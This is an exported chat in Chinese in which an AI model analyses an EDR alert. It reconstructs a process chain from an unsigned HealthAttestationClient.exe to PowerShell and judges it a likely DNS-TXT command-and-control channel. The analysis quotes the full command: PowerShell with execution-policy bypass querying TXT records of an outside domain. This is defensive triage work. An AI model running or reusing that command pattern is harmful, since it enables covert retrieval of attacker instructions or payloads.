PowerShell告警行为链分析

AVL-Zero 提供的 澜砥 N2.5 模型 · 导出时间: 2026-06-16T13:52:39.120Z

请基于以下json数据,给我分析一下这个行为是否存在威胁: { "alarm_info": { "behavior_alarm": { "AIanalysis": 0, "author": "defend", "label": "执行.利用命令和脚本解释器.利用PowerShell-T1059.001", "level": 3, "rule_id": "wop0060008", "target": "self" }, "executable_alarm": { "rule_id": "", "target": "", "template_id": "" } }, "dispose_info_list": [ { "dispose": "automatic_release", "object": "", "result": "", "type": "event" }, { "dispose": "release", "object": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "result": "unprocessed", "type": "process" }, { "dispose": "release", "object": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "result": "unprocessed", "type": "file" } ], "magic": "antiyedr", "operate": "create", "process_info_parent": { "account": "Administrator", "active_mode": 2, "family_list": [ { "param": "C:\Windows\Explorer.EXE", "path": "C:\Windows\explorer.exe", "pid": 5408, "ppid": 5340 }, { "param": "", "path": "C:\Windows\System32\userinit.exe", "pid": 5340, "ppid": 1008 }, { "param": "winlogon.exe", "path": "C:\Windows\System32\winlogon.exe", "pid": 1008, "ppid": 788 } ], "file_info": { "basic_info": { "arch": "AMD64", "certificate_info": [], "compile_time": 1770806663, "compiler_pack": "Compiler/Microsoft.VISUAL_C@18", "copyright_info": { "ver_company": "Microsoft Corporation", "ver_file_description": "HealthAttestationClient", "ver_internal_name": "", "ver_legal_copyright": "© 2024 Microsoft Corporation. All rights reserved.", "ver_origina_file_name": "", "ver_product_name": "HealthAttestationClient", "ver_product_version": "1.0.26100.0", "ver_software_version": "0.1.0.0" }, "format": "BinExecute/Microsoft.EXE[:X64]", "is_system_file": 0, "package_name": "", "package_type": 0, "sfx_info": "", "sha1": "E71264E6B892D0A61B81E08BE4E544F429A6BC45", "sha256": "E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07", "size": 459776, "symbol_path": "self_task_monitor.pdb" }, "create_time": 1776671561, "detect_info": { "detect_author": "", "detect_id": "", "detect_module": "", "fsign": "9FB6FEDB677A7B6C590880B870284043FCD5C55D7F83146E", "rule_state": "", "state": "unknown", "virus_name": "" }, "entity_exist": true, "file_attr": "", "file_location": 2, "file_ownership": 999, "is_hidden": false, "md5": "7F83146EDF60C129AA054ADCFCD5C55D", "modify_time": 1776671561, "path": "C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe", "vendor_ownership": "HealthAttestationClient" }, "is_local": true, "param": ""C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe" ", "pid": 13892, "priviledge": "medium", "ptime": 1779261623 }, "process_info_self": { "account": "Administrator", "active_mode": 2, "family_list": [ { "param": ""C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe" ", "path": "C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe", "pid": 13892, "ppid": 5408 }, { "param": "C:\Windows\Explorer.EXE", "path": "C:\Windows\explorer.exe", "pid": 5408, "ppid": 5340 }, { "param": "", "path": "C:\Windows\System32\userinit.exe", "pid": 5340, "ppid": 1008 }, { "param": "winlogon.exe", "path": "C:\Windows\System32\winlogon.exe", "pid": 1008, "ppid": 788 } ], "file_info": { "basic_info": { "arch": "AMD64", "certificate_info": [], "compile_time": 2128232725, "compiler_pack": "", "copyright_info": { "ver_company": "Microsoft Corporation", "ver_file_description": "Windows PowerShell", "ver_internal_name": "POWERSHELL", "ver_legal_copyright": "© Microsoft Corporation. All rights reserved.", "ver_origina_file_name": "PowerShell.EXE.MUI", "ver_product_name": "Microsoft® Windows® Operating System", "ver_product_version": "10.0.19041.4522", "ver_software_version": "10.0.19041.546" }, "format": "BinExecute/Microsoft.EXE[:X64]", "is_system_file": 1, "package_name": "", "package_type": 0, "sfx_info": "", "sha1": "F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054", "sha256": "9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F", "size": 452608, "symbol_path": "powershell.pdb" }, "create_time": 1659691640, "detect_info": { "detect_author": "", "detect_id": "", "detect_module": "", "fsign": "000000000000000000000000000000000000000000000000", "rule_state": "", "state": "white", "virus_name": "" }, "entity_exist": true, "file_attr": "rw", "file_location": 2, "file_ownership": 0, "is_hidden": false, "md5": "04029E121A0CFA5991749937DD22A1D9", "modify_time": 1659691640, "path": "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "vendor_ownership": "Microsoft® Windows® Operating System" }, "is_local": true, "param": ""powershell.exe" -NoProfile -ExecutionPolicy ByPass -Command "chcp 65001; $domain=\"dnsauth.gelinpp.com\"; $DnsServers = '1.1.1.1'\r\ntry {\r\n ipconfig /flushdns | Out-Null\r\n $txtRecords = Resolve-DnsName -Name $domain -Type TXT -Server $DnsServers -ErrorAction Stop\r\n foreach ($record in $txtRecords) {\r\n $record.Strings | ForEach-Object { Write-Output $ }\r\n }\r\n exit 0\r\n} catch {\r\n exit 1\r\n}"", "pid": 6944, "priviledge": "medium", "ptime": 1779267344 }, "time": 1779267345, "type": "process_behavior", "uuid": "6A19F1ABFE6EB852BDF7DD99D4B15C16", "ver": "V3.0", "guid": "17f45e65563517e9b5165bc9175e99a0" }

AVL Code 生成于 2026/6/16 21:52:39

威胁分析报告

一、告警概要

字段
告警规则 wop0060008 — 执行.利用命令和脚本解释器.利用PowerShell-T1059.001
严重等级 3(中高危)
告警类型 进程行为告警
处置状态 automatic_release(自动放过)

二、行为链还原

winlogon.exe (pid:788)  └─ userinit.exe (pid:1008)       └─ explorer.exe (pid:5408)            └─ HealthAttestationClient.exe (pid:13892, 父进程)                 └─ powershell.exe (pid:6944, 告警进程)

关键时间线:

  • HealthAttestationClient.exe 启动时间:1779261623
  • powershell.exe 启动时间:1779267344
  • 告警触发时间:1779267345(几乎与 PowerShell 启动同时)

三、父进程分析:HealthAttestationClient.exe

属性
路径 C:\Windows\System32\HealthAttestationClient\HealthAttestationClient.exe
数字签名 无证书信息(certificate_info: [])
SHA256 E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07
编译时间 2026-02-06 左右(Unix 1770806663)
编译工具 Microsoft Visual C++ 18
检测状态 unknown(未知)
厂商归属 "HealthAttestationClient"
系统文件标志 非系统文件(is_system_file: 0)

⚠️ 异常点:

  1. 无数字签名 — 微软官方 Windows 组件(如真正的 HealthAttestationClient)应有微软数字签名,此处为空
  2. 非系统文件 — 位于 System32 子目录但未被标记为系统文件
  3. 检测状态为 unknown — 安天引擎未判定为白文件
  4. 编译时间异常 — 编译于 2026 年 2 月,但 Windows 10 的正式组件不应有如此新的编译时间戳(除非是 Windows 预览版或自定义编译)

四、子进程分析:powershell.exe(告警主体)

执行命令(已解码):

powershell.exe -NoProfile -ExecutionPolicy ByPass -Command "chcp 65001;$domain='_dnsauth.gelinpp.com';$DnsServers = '1.1.1.1'try {    ipconfig /flushdns | Out-Null    $txtRecords = Resolve-DnsName -Name $domain -Type TXT -Server $DnsServers -ErrorAction Stop    foreach ($record in $txtRecords) {        $record.Strings | ForEach-Object { Write-Output $_ }    }    exit 0} catch {    exit 1}"
属性
路径 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SHA256 9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
检测状态 white(白文件)— 微软官方 PowerShell
系统文件标志 是(is_system_file: 1)
权限等级 medium(中等完整性)

五、命令行为深度分析

PowerShell 执行的具体操作:

  1. chcp 65001 — 切换控制台代码页为 UTF-8
  2. ipconfig /flushdns — 清除 DNS 缓存(隐蔽性操作,避免本地缓存干扰)
  3. Resolve-DnsName -Name _dnsauth.gelinpp.com -Type TXT -Server 1.1.1.1 — 向 Cloudflare DNS (1.1.1.1) 查询域名的 TXT 记录

TXT 查询的威胁含义:

  • 域名 _dnsauth.gelinpp.com 是典型的 DNS TXT 记录隐蔽通道(DNS-over-TXT) 模式
  • _dnsauth 子域名前缀伪装成"DNS 认证验证"用途(如 Let's Encrypt 的 DNS-01 验证也使用 _acme-challenge 前缀),具有欺骗性
  • 攻击者常将 C2 指令、Payload 或加密后的配置数据编码在 TXT 记录中,通过 DNS 查询获取,从而:
    • 绕过基于 IP/域名黑名单的传统检测
    • 利用 DNS 协议(通常不被严格过滤)实现隐蔽通信
    • 规避 HTTP/HTTPS 流量检测

六、综合威胁判定

维度 评估
告警规则 ✅ 命中 MITRE ATT&CK T1059.001(PowerShell),规则准确
父进程合法性 ⚠️ 可疑 — HealthAttestationClient.exe 无签名、非系统文件、检测状态 unknown
PowerShell 调用参数 ⚠️ 典型恶意模式 — -NoProfile -ExecutionPolicy ByPass 绕过执行策略
命令行为 🔴 高可疑 — DNS TXT 记录查询,典型的隐蔽 C2 信道手法
域名 🔴 可疑gelinpp.com 非知名服务商,_dnsauth 前缀伪装
处置结果 ⚠️ 已自动放过(automatic_release),未进行阻断

七、结论

此行为具有较高的威胁可能性,判定为:可疑恶意活动(高置信度)

具体来说,这是一起典型的 Living-off-the-Land (LotL) 攻击行为:

  • 攻击者通过一个无签名、非系统文件的可疑程序(HealthAttestationClient.exe)作为跳板
  • 启动合法的 PowerShell 进程,使用 Bypass 策略绕过执行限制
  • 通过 DNS TXT 记录查询从远程服务器获取指令或载荷
  • 整个链路模仿了常见的 DNS-over-TXT 隐蔽信道 技术,常用于 C2 通信、Payload 投递

八、建议处置

  1. 立即隔离 终端 HealthAttestationClient.exe(路径:C:\Windows\System32\HealthAttestationClient\
  2. 提取并分析 HealthAttestationClient.exe 样本(SHA256: E566B1C4FE1596708B900A887631C0775AF06B39BD168FC96140909AB5919A07)进行逆向分析
  3. 查询域名 gelinpp.com 的历史威胁情报
  4. 检查同主机 是否存在其他异常进程或持久化机制
  5. 确认放行策略 — 当前 automatic_release 处置策略建议调整为 blockterminate
AVL Code 生成于 2026/6/16 21:52:39